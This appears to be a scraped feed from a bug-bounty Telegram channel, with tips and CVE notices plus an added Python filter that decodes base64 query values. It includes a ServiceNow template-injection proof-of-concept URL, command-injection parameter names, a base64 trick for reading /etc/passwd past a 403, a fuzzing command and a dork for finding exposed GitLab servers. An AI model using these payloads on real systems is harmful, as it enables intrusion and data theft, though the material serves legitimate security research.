Brut Security pinned «📣 Understanding Bug Bounty Hunting for Newcomers📣 🎁 Bug bounty hunting can seem appealing, but it’s important to know: 🖱 High Skill Level Required: Success in bug bounty hunting demands a very high skill level. It's not just about using tools like Nuclei to…»
http://1337/login.do?jvar_page_noscript=<style><j:jelly xmlns:j="jelly" xmlns:g='glide'><g:evaluate>gs.addErrorMessage(7*7);</g:evaluate></j:jelly></style>
🔖#bugbounty #bugbountytips #infosec
www.assetnote.io
Chaining Three Bugs to Access All Your ServiceNow Data
Through the course of 3/4 weeks, we were able to find a chain of vulnerabilities that allows full database access and full access to any MID servers configured. This resulted in 3 separate CVEs.
shreyaschavhan on Notion
Year in Bug Bounties - from 0 to $25,700* in 12 months (Stats, Graphs, Learnings, Experiences & Plans!) | Notion
Table of Content:
ffuf -c -ac -r -u https://target[.]com/FUZZ -w wordlist.txt
GitHub
GitHub - six2dez/OneListForAll: Rockyou for web fuzzing
Rockyou for web fuzzing. Contribute to six2dez/OneListForAll development by creating an account on GitHub.
CVE-2024-6385: Improper Access Control in GitLab, 9.6 rating 🔥
The new vulnerability allows an attacker to run pipeline jobs with the rights of any other user.
Search at Netlas.io:
👉 Link: https://nt.ls/HvsUY
👉 Dork: http.favicon.hash_sha256:72a2cad5025aa931d6ea56c3201d1f18e68a8cd39788c7c80d5b2b82aa5143ef
Read more: https://www.bleepingcomputer.com/news/security/gitlab-warns-of-critical-bug-that-lets-attackers-run-pipelines-as-an-arbitrary-user/
YouTube
CVE-2024-4879 | Template Injection Vulnerability in ServiceNow | Bug Bounty POC | Brut Security
🚨CVE-2024-4879 & CVE-2024-5217: ServiceNow Security Vulnerabilities Expose Businesses to RCE and Data Breaches
⚖These vulnerabilities enable unauthenticated remote attackers to execute arbitrary code within the Now Platform,
potentially leading to complete…
Brut Security
Parameters where you can try Command Injection. ?cmd={payload} ?exec={payload} ?command={payload} ?execute{payload} ?ping={payload} ?query={payload} ?jump={payload} ?code={payload} ?reg={payload} ?do={payload} ?func={payload} ?arg={payload} …
Keep Checking Old Posts 🍿
url/?f=etc/passwd ==> 403
encode etc/passwd as base64
url/?f=L2V0Yy9wYXNzd2Q= ==> 200
#note
You can use this trick in SQL, SSTI, XSS, LFI, etc.
By: @GodfatherOrwa
#bugbountytips #BugBounty
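Seen from the filtering side, the tip above means a rule that matches only the raw parameter value never sees the base64 form. The following is an added example (not from the channel or the post's author) that decodes each query value layer by layer before matching; the signature list, function names and sample URLs are assumptions made for illustration.

```python
import base64
import binascii
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Illustrative deny patterns (assumed for this example; a real rule set is larger).
SIGNATURES = {
    "path": re.compile(r"(?:^|/)etc/passwd|\.\./"),
    "xss": re.compile(r"<\s*script", re.I),
    "ssti": re.compile(r"\{\{.*?\}\}"),
}
B64_RE = re.compile(r"^[A-Za-z0-9+/_-]{8,}={0,2}$")

def try_b64(value):
    """Return the decoded text if value is base64 of printable UTF-8, else None."""
    value = value.replace(" ", "+")  # parse_qsl turns '+' into a space
    if not B64_RE.match(value):
        return None
    body = value.rstrip("=").replace("-", "+").replace("_", "/")
    try:
        text = base64.b64decode(body + "=" * (-len(body) % 4), validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None
    return text if text.isprintable() else None

def canonical_forms(value, max_depth=3):
    """Return value plus every layer revealed by URL- or base64-decoding it."""
    seen, frontier = [value], [value]
    for _ in range(max_depth):  # bounded, so nested encodings cannot loop forever
        decoded = [d for v in frontier for d in (unquote(v), try_b64(v))]
        frontier = []
        for d in decoded:
            if d is not None and d not in seen:
                seen.append(d)
                frontier.append(d)
    return seen

def inspect(url):
    """Return (parameter, rule, decoded form) for every signature hit in the query."""
    hits = []
    for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        for form in canonical_forms(value):
            hits += [(name, rule, form) for rule, rx in SIGNATURES.items() if rx.search(form)]
    return hits

if __name__ == "__main__":  # constructed requests mirroring the post
    for q in ("f=etc/passwd", "f=L2V0Yy9wYXNzd2Q=", "f=report.pdf"):
        print(q, "->", inspect("https://app.example/?" + q))
```

The same rule set fires on the raw and the encoded request because matching happens on the decoded forms, which is where an application that base64-decodes the parameter would see the value.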